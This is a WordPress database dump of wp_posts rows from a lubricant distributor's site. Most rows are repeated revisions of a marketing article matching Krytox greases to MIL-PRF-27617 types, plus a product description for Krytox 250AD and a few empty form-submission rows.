INSERT INTO `wp_posts` VALUES (4861, 2, '2017-08-18 19:38:48', '2017-08-18 19:38:48', '', 'mil-spec lubricant krytox', '', 'inherit', 'closed', 'closed', '', 'mil-spec-lubricant-krytox', '', '', '2017-08-18 19:39:04', '2017-08-18 19:39:04', '', 4860, 'https://www.miller-stephenson.com/wp-content/uploads/2017/08/Mil-Spec-Lubricant-Krytox.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4862, 2, '2017-08-18 19:54:45', '2017-08-18 19:54:45', '<h2>Military Specification Lubrication | Defense Standards</h2>\r\nA United States <b>defense standard</b>, often called a <b>military standard</b>, “<b>MIL-STD</b>“, “<b>MIL-SPEC</b>“, or (informally) “<b>MilSpecs</b>“, is used to help achieve standardization objectives by the U.S. Department of Defense. Standardization is beneficial in achieving interoperability, ensuring products meet certain requirements, commonality, reliability, the total cost of ownership, compatibility with logistics systems, and similar defense-related objectives.\r\n\r\nSpecialized MIL-Specs (MIL-PRF-27617) were developed to cover the requirements for greases resistant to hydrocarbon fuel and liquid oxygen specifically applicable in aircraft, aerospace vehicles, and supporting equipment. These fuel resistant greases are intended for use in the lubrication of taper plug valves, gaskets, and bearings in fuel systems of aircraft and ground support equipment. It is also suitable for use in the presence of liquid oxygen as a lubricant for valves, threads, and bearings in aerospace vehicles. Within the MIL-PRF-27617 there are delineations into sub-types,  Type I-V.  These ‘Types’ have specified parameters and performance metrics defined within them that lubricants must meet to be utilized in applications which call for that MIL-SPEC Type.\r\n\r\nDefense standards are also used by other nondefense government organizations, technical organizations, and industry. This article discusses definitions, history, and usage of defense standards. Related documents, such as <b>defense handbooks</b> and <b>defense specifications</b>, are also addressed.\r\n\r\nhttps://en.wikipedia.org/wiki/United_States_Military_Standard\r\n<h3>MIL-SPEC PRF-27617 TYPE I</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-6">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<p class="wpb_text_column wpb_content_element " style="text-align: left;"></p>\r\n\r\n<div class="wpb_wrapper">\r\n\r\nMIL-PRF-27617 Type I performance requirements typically require lower temperature range and lower viscosity greases and are not designed for high-temperature applications. However, they exhibit high penetration, no oil separation, and complete oxygen stability. An excellent representation of a lubricant which excels within this MIL-SPEC is <a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>Krytox™ 240AZ. </strong></a>\r\n\r\n</div>\r\n&nbsp;\r\n<p class="vc_btn3-container vc_btn3-center" style="text-align: left;"></p>\r\n\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n<h3>MIL-SPEC PRF-27617 TYPE II</h3>\r\nMIL-SPEC PRF 27617 Type II have increased temperature stability range from -40 to 204 C and offer exceptional chemical and thermal stability, minimal evaporation, low hydrocarbon fuel solubility, and &lt;20% water-washout while providing NGLI 2 penetration.  One of the highest-performing lubricants which conform to the Type II specifications is <a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>Krytox™ 240AB</strong>.</a>\r\n<h3>MIL-SPEC PRF-27617 TYPE III</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-6">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-SPEC 27617 Type III greases exhibit NLGI 2 penetration, extremely high temperature, and oxidation stability, &lt;20% solubility in a hydrocarbon fuel, and minimal evaporation at 200 C. An industry standard which exceeds all of these metrics and is well known for offering unmatched performance is <a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>Krytox™</strong> <strong>240AC.</strong></a>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n<h3>MIL-SPEC PRF-27617 TYPE IV</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid">MIL-SPEC PRF 26717 Type IV greases must exhibit minimal evaporation,  low fuel solubility, complete oxygen stability, offer excellent resistance to extreme pressure over wide temperature range, and modest changes in worked vs unworked penetrations. Known for its unsurpassed performance, <a href="https://www.miller-stephenson.com/product/krytox-fpg-028/"><strong>Krytox™</strong><strong> FPG 028</strong> </a>delivers top-tier performance in all critical physical properties and is designed to operate under severe conditions, and can be used for bearings, gears, and as a lubricant for O-rings and elastomers.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid"></div>', 'How Krytox Meets the Mil-Spec Standards for Lubrication', '', 'inherit', 'closed', 'closed', '', '4860-revision-v1', '', '', '2017-08-18 19:54:45', '2017-08-18 19:54:45', '', 4860, 'https://www.miller-stephenson.com/4860-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4863, 2, '2017-08-18 19:55:23', '2017-08-18 19:55:23', '<h2>Military Specification Lubrication | Defense Standards</h2>\r\nA United States <b>defense standard</b>, often called a <b>military standard</b>, “<b>MIL-STD</b>“, “<b>MIL-SPEC</b>“, or (informally) “<b>MilSpecs</b>“, is used to help achieve standardization objectives by the U.S. Department of Defense. Standardization is beneficial in achieving interoperability, ensuring products meet certain requirements, commonality, reliability, the total cost of ownership, compatibility with logistics systems, and similar defense-related objectives.\r\n\r\nSpecialized MIL-Specs (MIL-PRF-27617) were developed to cover the requirements for greases resistant to hydrocarbon fuel and liquid oxygen specifically applicable in aircraft, aerospace vehicles, and supporting equipment. These fuel resistant greases are intended for use in the lubrication of taper plug valves, gaskets, and bearings in fuel systems of aircraft and ground support equipment. It is also suitable for use in the presence of liquid oxygen as a lubricant for valves, threads, and bearings in aerospace vehicles. Within the MIL-PRF-27617 there are delineations into sub-types,  Type I-V.  These ‘Types’ have specified parameters and performance metrics defined within them that lubricants must meet to be utilized in applications which call for that MIL-SPEC Type.\r\n\r\nDefense standards are also used by other nondefense government organizations, technical organizations, and industry. This article discusses definitions, history, and usage of defense standards. Related documents, such as <b>defense handbooks</b> and <b>defense specifications</b>, are also addressed.\r\n\r\nhttps://en.wikipedia.org/wiki/United_States_Military_Standard\r\n<h3>MIL-SPEC PRF-27617 TYPE I</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-6">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-PRF-27617 Type I performance requirements typically require lower temperature range and lower viscosity greases and are not designed for high-temperature applications. However, they exhibit high penetration, no oil separation, and complete oxygen stability. An excellent representation of a lubricant which excels within this MIL-SPEC is <a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>Krytox™ 240AZ. </strong></a>\r\n\r\n</div>\r\n<h3>MIL-SPEC PRF-27617 TYPE II</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-SPEC PRF 27617 Type II have increased temperature stability range from -40 to 204 C and offer exceptional chemical and thermal stability, minimal evaporation, low hydrocarbon fuel solubility, and &lt;20% water-washout while providing NGLI 2 penetration.  One of the highest-performing lubricants which conform to the Type II specifications is <a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>Krytox™ 240AB</strong>.</a>\r\n<h3>MIL-SPEC PRF-27617 TYPE III</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-6">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-SPEC 27617 Type III greases exhibit NLGI 2 penetration, extremely high temperature, and oxidation stability, &lt;20% solubility in a hydrocarbon fuel, and minimal evaporation at 200 C. An industry standard which exceeds all of these metrics and is well known for offering unmatched performance is <a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>Krytox™</strong> <strong>240AC.</strong></a>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n<h3>MIL-SPEC PRF-27617 TYPE IV</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid">MIL-SPEC PRF 26717 Type IV greases must exhibit minimal evaporation,  low fuel solubility, complete oxygen stability, offer excellent resistance to extreme pressure over wide temperature range, and modest changes in worked vs unworked penetrations. Known for its unsurpassed performance, <a href="https://www.miller-stephenson.com/product/krytox-fpg-028/"><strong>Krytox™</strong><strong> FPG 028</strong> </a>delivers top-tier performance in all critical physical properties and is designed to operate under severe conditions, and can be used for bearings, gears, and as a lubricant for O-rings and elastomers.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid"></div>', 'How Krytox Meets the Mil-Spec Standards for Lubrication', '', 'inherit', 'closed', 'closed', '', '4860-revision-v1', '', '', '2017-08-18 19:55:23', '2017-08-18 19:55:23', '', 4860, 'https://www.miller-stephenson.com/4860-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4864, 2, '2017-08-18 19:56:16', '2017-08-18 19:56:16', '<h2>Military Specification Lubrication | Mil-Spec Lubrication</h2>\r\nA United States <b>defense standard</b>, often called a <b>military standard</b>, “<b>MIL-STD</b>“, “<b>MIL-SPEC</b>“, or (informally) “<b>MilSpecs</b>“, is used to help achieve standardization objectives by the U.S. Department of Defense. Standardization is beneficial in achieving interoperability, ensuring products meet certain requirements, commonality, reliability, the total cost of ownership, compatibility with logistics systems, and similar defense-related objectives.\r\n\r\nSpecialized MIL-Specs (MIL-PRF-27617) were developed to cover the requirements for greases resistant to hydrocarbon fuel and liquid oxygen specifically applicable in aircraft, aerospace vehicles, and supporting equipment. These fuel resistant greases are intended for use in the lubrication of taper plug valves, gaskets, and bearings in fuel systems of aircraft and ground support equipment. It is also suitable for use in the presence of liquid oxygen as a lubricant for valves, threads, and bearings in aerospace vehicles. Within the MIL-PRF-27617 there are delineations into sub-types,  Type I-V.  These ‘Types’ have specified parameters and performance metrics defined within them that lubricants must meet to be utilized in applications which call for that MIL-SPEC Type.\r\n\r\nDefense standards are also used by other nondefense government organizations, technical organizations, and industry. This article discusses definitions, history, and usage of defense standards. Related documents, such as <b>defense handbooks</b> and <b>defense specifications</b>, are also addressed.\r\n\r\nhttps://en.wikipedia.org/wiki/United_States_Military_Standard\r\n<h3>MIL-SPEC PRF-27617 TYPE I</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-6">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-PRF-27617 Type I performance requirements typically require lower temperature range and lower viscosity greases and are not designed for high-temperature applications. However, they exhibit high penetration, no oil separation, and complete oxygen stability. An excellent representation of a lubricant which excels within this MIL-SPEC is <a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>Krytox™ 240AZ. </strong></a>\r\n\r\n</div>\r\n<h3>MIL-SPEC PRF-27617 TYPE II</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-SPEC PRF 27617 Type II have increased temperature stability range from -40 to 204 C and offer exceptional chemical and thermal stability, minimal evaporation, low hydrocarbon fuel solubility, and &lt;20% water-washout while providing NGLI 2 penetration.  One of the highest-performing lubricants which conform to the Type II specifications is <a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>Krytox™ 240AB</strong>.</a>\r\n<h3>MIL-SPEC PRF-27617 TYPE III</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-6">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-SPEC 27617 Type III greases exhibit NLGI 2 penetration, extremely high temperature, and oxidation stability, &lt;20% solubility in a hydrocarbon fuel, and minimal evaporation at 200 C. An industry standard which exceeds all of these metrics and is well known for offering unmatched performance is <a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>Krytox™</strong> <strong>240AC.</strong></a>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n<h3>MIL-SPEC PRF-27617 TYPE IV</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid">MIL-SPEC PRF 26717 Type IV greases must exhibit minimal evaporation,  low fuel solubility, complete oxygen stability, offer excellent resistance to extreme pressure over wide temperature range, and modest changes in worked vs unworked penetrations. Known for its unsurpassed performance, <a href="https://www.miller-stephenson.com/product/krytox-fpg-028/"><strong>Krytox™</strong><strong> FPG 028</strong> </a>delivers top-tier performance in all critical physical properties and is designed to operate under severe conditions, and can be used for bearings, gears, and as a lubricant for O-rings and elastomers.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid"></div>', 'How Krytox Meets the Mil-Spec Standards for Lubrication', '', 'inherit', 'closed', 'closed', '', '4860-revision-v1', '', '', '2017-08-18 19:56:16', '2017-08-18 19:56:16', '', 4860, 'https://www.miller-stephenson.com/4860-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4865, 2, '2017-08-18 19:58:00', '2017-08-18 19:58:00', '<h2>Military Specification Lubrication | Mil-Spec Lubrication</h2>\nA United States <b>defense standard</b>, often called a <b>military standard</b>, “<b>MIL-STD</b>“, “<b>MIL-SPEC</b>“, or (informally) “<b>MilSpecs</b>“, is used to help achieve standardization objectives by the U.S. Department of Defense. Standardization is beneficial in achieving interoperability, ensuring products meet certain requirements, commonality, reliability, the total cost of ownership, compatibility with logistics systems, and similar defense-related objectives.\n\nSpecialized MIL-Specs (MIL-PRF-27617) were developed to cover the requirements for greases resistant to hydrocarbon fuel and liquid oxygen specifically applicable in aircraft, aerospace vehicles, and supporting equipment. These fuel resistant greases are intended for use in the lubrication of taper plug valves, gaskets, and bearings in fuel systems of aircraft and ground support equipment. It is also suitable for use in the presence of liquid oxygen as a lubricant for valves, threads, and bearings in aerospace vehicles. Within the MIL-PRF-27617 there are delineations into sub-types,  Type I-V.  These ‘Types’ have specified parameters and performance metrics defined within them that lubricants must meet to be utilized in applications which call for that MIL-SPEC Type.\n\nDefense standards are also used by other nondefense government organizations, technical organizations, and industry. This article discusses definitions, history, and usage of defense standards. Related documents, such as <b>defense handbooks</b> and <b>defense specifications</b>, are also addressed.\n\nhttps://en.wikipedia.org/wiki/United_States_Military_Standard\n<h3>MIL-SPEC PRF-27617 TYPE I</h3>\n<div class="vc_row wpb_row vc_row-fluid">\n<div class="wpb_column vc_column_container vc_col-sm-12">\n<div class="vc_column-inner ">\n<div class="wpb_wrapper">\n<div class="wpb_text_column wpb_content_element ">\n<div class="wpb_wrapper">\n<div class="vc_row wpb_row vc_row-fluid">\n<div class="wpb_column vc_column_container vc_col-sm-6">\n<div class="vc_column-inner ">\n<div class="wpb_wrapper">\n<div class="wpb_wrapper">\n\nMIL-PRF-27617 Type I performance lubricant requirements typically require lower temperature range and lower viscosity greases and are not designed for high-temperature applications. However, they exhibit high penetration, no oil separation, and complete oxygen stability. An excellent representation of a lubricant which excels within this MIL-SPEC is <a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>Krytox™ 240AZ. </strong></a>\n\n</div>\n<h3>MIL-SPEC PRF-27617 TYPE II</h3>\n<div class="vc_row wpb_row vc_row-fluid">\n<div class="wpb_column vc_column_container vc_col-sm-12">\n<div class="vc_column-inner ">\n<div class="wpb_wrapper">\n<div class="wpb_text_column wpb_content_element ">\n<div class="wpb_wrapper">\n\nMIL-SPEC PRF 27617 Type II lubricants have increased temperature stability range from -40 to 204 C and offer exceptional chemical and thermal stability, minimal evaporation, low hydrocarbon fuel solubility, and &lt;20% water-washout while providing NGLI 2 penetration.  One of the highest-performing lubricants which conform to the Type II specifications is <a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>Krytox™ 240AB</strong>.</a>\n<h3>MIL-SPEC PRF-27617 TYPE III</h3>\n<div class="vc_row wpb_row vc_row-fluid">\n<div class="wpb_column vc_column_container vc_col-sm-6">\n<div class="vc_column-inner ">\n<div class="wpb_wrapper">\n<div class="wpb_text_column wpb_content_element ">\n<div class="wpb_wrapper">\n\nMIL-SPEC 27617 Type III greases exhibit NLGI 2 penetration, extremely high temperature, and oxidation stability, &lt;20% solubility in a hydrocarbon fuel, and minimal evaporation at 200 C. An industry standard which exceeds all of these metrics and is well-known for offering unmatched performance is <a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>Krytox™</strong> <strong>240AC.</strong></a>\n<div class="vc_row wpb_row vc_row-fluid">\n<div class="wpb_column vc_column_container vc_col-sm-12">\n<div class="vc_column-inner ">\n<div class="wpb_wrapper">\n<div class="wpb_text_column wpb_content_element ">\n<div class="wpb_wrapper">\n<h3>MIL-SPEC PRF-27617 TYPE IV</h3>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class="vc_row wpb_row vc_row-fluid">MIL-SPEC PRF 26717 Type IV greases must exhibit minimal evaporation,  low fuel solubility, complete oxygen stability, offer excellent resistance to extreme pressure over wide temperature range, and modest changes in worked vs unworked penetrations. Known for its unsurpassed performance, <a href="https://www.miller-stephenson.com/product/krytox-fpg-028/"><strong>Krytox™</strong><strong> FPG 028</strong> </a>delivers top-tier performance in all critical physical properties and is designed to operate under severe conditions, and can be used for bearings, gears, and as a lubricant for O-rings and elastomers.</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class="vc_row wpb_row vc_row-fluid"></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n&nbsp;\n\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class="vc_row wpb_row vc_row-fluid"></div>', 'How Krytox Meets the Mil-Spec Standards for Lubrication', '', 'inherit', 'closed', 'closed', '', '4860-autosave-v1', '', '', '2017-08-18 19:58:00', '2017-08-18 19:58:00', '', 4860, 'https://www.miller-stephenson.com/4860-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4866, 2, '2017-08-18 19:59:02', '2017-08-18 19:59:02', '<h2>Military Specification Lubrication | Mil-Spec Lubrication</h2>\r\nA United States <b>defense standard</b>, often called a <b>military standard</b>, “<b>MIL-STD</b>“, “<b>MIL-SPEC</b>“, or (informally) “<b>MilSpecs</b>“, is used to help achieve standardization objectives by the U.S. Department of Defense. Standardization is beneficial in achieving interoperability, ensuring products meet certain requirements, commonality, reliability, the total cost of ownership, compatibility with logistics systems, and similar defense-related objectives.\r\n\r\nSpecialized MIL-Specs (MIL-PRF-27617) were developed to cover the requirements for greases resistant to hydrocarbon fuel and liquid oxygen specifically applicable in aircraft, aerospace vehicles, and supporting equipment. These fuel resistant greases are intended for use in the lubrication of taper plug valves, gaskets, and bearings in fuel systems of aircraft and ground support equipment. It is also suitable for use in the presence of liquid oxygen as a lubricant for valves, threads, and bearings in aerospace vehicles. Within the MIL-PRF-27617 there are delineations into sub-types,  Type I-V.  These ‘Types’ have specified parameters and performance metrics defined within them that lubricants must meet to be utilized in applications which call for that MIL-SPEC Type.\r\n\r\nDefense standards are also used by other nondefense government organizations, technical organizations, and industry. This article discusses definitions, history, and usage of defense standards. Related documents, such as <b>defense handbooks</b> and <b>defense specifications</b>, are also addressed.\r\n\r\nhttps://en.wikipedia.org/wiki/United_States_Military_Standard\r\n<h3>MIL-SPEC PRF-27617 TYPE I</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-6">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-PRF-27617 Type I performance lubricant requirements typically require lower temperature range and lower viscosity greases and are not designed for high-temperature applications. However, they exhibit high penetration, no oil separation, and complete oxygen stability. An excellent representation of a lubricant which excels within this MIL-SPEC is <a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>Krytox™ 240AZ. </strong></a>\r\n\r\n</div>\r\n<h3>MIL-SPEC PRF-27617 TYPE II</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-SPEC PRF 27617 Type II lubricants have increased temperature stability range from -40 to 204 C and offer exceptional chemical and thermal stability, minimal evaporation, low hydrocarbon fuel solubility, and &lt;20% water-washout while providing NGLI 2 penetration.  One of the highest-performing lubricants which conform to the Type II specifications is <a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>Krytox™ 240AB</strong>.</a>\r\n<h3>MIL-SPEC PRF-27617 TYPE III</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-6">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-SPEC 27617 Type III greases exhibit NLGI 2 penetration, extremely high temperature, and oxidation stability, &lt;20% solubility in a hydrocarbon fuel, and minimal evaporation at 200 C. An industry standard which exceeds all of these metrics and is well-known for offering unmatched performance is <a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>Krytox™</strong> <strong>240AC.</strong></a>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n<h3>MIL-SPEC PRF-27617 TYPE IV</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid">MIL-SPEC PRF 26717 Type IV greases must exhibit minimal evaporation,  low fuel solubility, complete oxygen stability, offer excellent resistance to extreme pressure over wide temperature range, and modest changes in worked vs unworked penetrations. Known for its unsurpassed performance, <a href="https://www.miller-stephenson.com/product/krytox-fpg-028/"><strong>Krytox™</strong><strong> FPG 028</strong> </a>delivers top-tier performance in all critical physical properties and is designed to operate under severe conditions, and can be used for bearings, gears, and as a lubricant for O-rings and elastomers.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid"></div>', 'How Krytox Meets the Mil-Spec Standards for Lubrication', '', 'inherit', 'closed', 'closed', '', '4860-revision-v1', '', '', '2017-08-18 19:59:02', '2017-08-18 19:59:02', '', 4860, 'https://www.miller-stephenson.com/4860-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4867, 0, '2017-08-18 21:24:39', '2017-08-18 21:24:39', '', '', '', 'publish', 'closed', 'closed', '', '4867', '', '', '2017-08-18 21:24:39', '2017-08-18 21:24:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/4867/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4868, 0, '2017-08-21 09:54:00', '2017-08-21 09:54:00', '', '', '', 'publish', 'closed', 'closed', '', '4868', '', '', '2017-08-21 09:54:01', '2017-08-21 09:54:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/4868/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4869, 2, '2017-08-21 12:54:26', '2017-08-21 12:54:26', '<h2>Krytox 250AD High-Performance Aerospace &amp; Aviation Grease</h2>\nMolybdenum Disulfide Grease\n\nSince the first commercial application over 50 years ago, Krytox synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox lubricants continue to deliver extreme performance under extreme conditions. Krytox 250AD is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\n\nKrytox greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.\n\nKrytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.\n\nThe polymer chain is completely saturated and contains only carbon, oxygen, and fluorine. On a weight basis, a typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\n\nAll standard grades of grease are thickened with high-efficiency PTFE, whose formula is (CF2-CF2)n. This special high-efficiency thickener has a melting point of 325°C (617 °F) and has low molecular weight and submicron (0.2 μ) particle size for higher performance in bearings.', 'Krytox 250AD', 'Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.\n\n\nHighest viscosity in the 250 Series.\n\n\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '648-autosave-v1', '', '', '2017-08-21 12:54:26', '2017-08-21 12:54:26', '', 648, 'https://www.miller-stephenson.com/648-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4870, 2, '2017-08-21 13:03:05', '2017-08-21 13:03:05', '', '', '', 'publish', 'closed', 'closed', '', '4870', '', '', '2017-08-21 13:03:05', '2017-08-21 13:03:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/4870/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4871, 2, '2017-08-21 13:03:13', '0000-00-00 00:00:00', '', 'Auto Draft', '', 'auto-draft', 'closed', 'closed', '', '', '', '', '2017-08-21 13:03:13', '0000-00-00 00:00:00', '', 0, 'https://www.miller-stephenson.com/?p=4871', 0, 'post', '', 0); 
